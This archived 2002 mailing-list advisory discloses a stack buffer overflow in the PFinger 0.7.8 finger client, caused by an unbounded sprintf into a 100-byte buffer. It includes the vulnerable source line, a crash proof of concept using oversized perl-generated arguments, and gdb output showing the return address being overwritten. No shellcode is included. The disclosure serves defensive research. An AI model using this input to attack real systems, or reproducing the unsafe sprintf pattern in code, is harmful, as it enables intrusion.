Vulnerability Development mailing list archives

PFinger Buffer Overflow Vulnerability.

From: "dong-h0un U" <xploit () hackermail com>
Date: Tue, 04 Jun 2002 23:14:54 +0800


 PFinger Buffer Overflow Vulnerability.


 * Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)

 * Overview:

 Pfinger program has arrangement extent overflow bug.
 This is that is found in client.
 It did not confirm whether server side is weak.

 Similar various kinds bug may exist anyway. :-(

 * Description:

 This happens as arrangement "query(size 100)" becomes overflow.
 Of course, even if use (-l, -d, -t) option, cause same result.
 Because this uses wrongly sprintf(), is happened. (line:144)

 === pfinger-0.7.8/src/finger.c =================================

 :
 :
 int main( int   argc, char *argv[] )
 {
  int flag;
  char *progname;
  int info = 0;
  char *hostname;
  char query[100]; 
  :
  :
  sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
                  ~~~~~~~~
  DoFinger1(hostname, query);
  optind++;
 }  
 :
 :

 ================================================================
 
 Next, Stack is stored as following.

 query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];

 * Proof of concept:

 [x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 Segmentation fault
 [x82@xpl017elz src]$ gcc -v
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) 
 [x82@xpl017elz src]$

 - Debugging -

 [x82@xpl017elz src]$ gdb -q ./finger
 (gdb) r -l `perl -e 'print "x"x100'`
 Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
 x"x100'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 
 Program received signal SIGSEGV, Segmentation fault.
 0x4005000a in _ufc_foobar () from /lib/libc.so.6
 (gdb) r -l `perl -e 'print "x"x101'`
 
 Program received signal SIGSEGV, Segmentation fault.
 0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
 (gdb) r -l `perl -e 'print "x"x102'`
 
 Program received signal SIGSEGV, Segmentation fault.
 0xa0d78 in ?? ()
 (gdb)

 (gdb) r -l `perl -e 'print "x"x105'`
 Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
 x"x105'`
 finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
 
 Program received signal SIGSEGV, Segmentation fault.
 0x400a4b53 in strrchr () from /lib/libc.so.6
 (gdb) where
 #0  0x400a4b53 in strrchr () from /lib/libc.so.6
 #1  0xbffff564 in ?? ()
 #2  0x78787878 in ?? ()
 Cannot access memory at address 0x78787878.
 (gdb)    

 P.S: Sorry, my poor english.

 __
 By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
 E-mail: szoahc () hotmail com
 Home: http://x82.i21c.net


-- 

Powered by Outblaze
Current thread:

PFinger Buffer Overflow Vulnerability. dong-h0un U (Jun 04)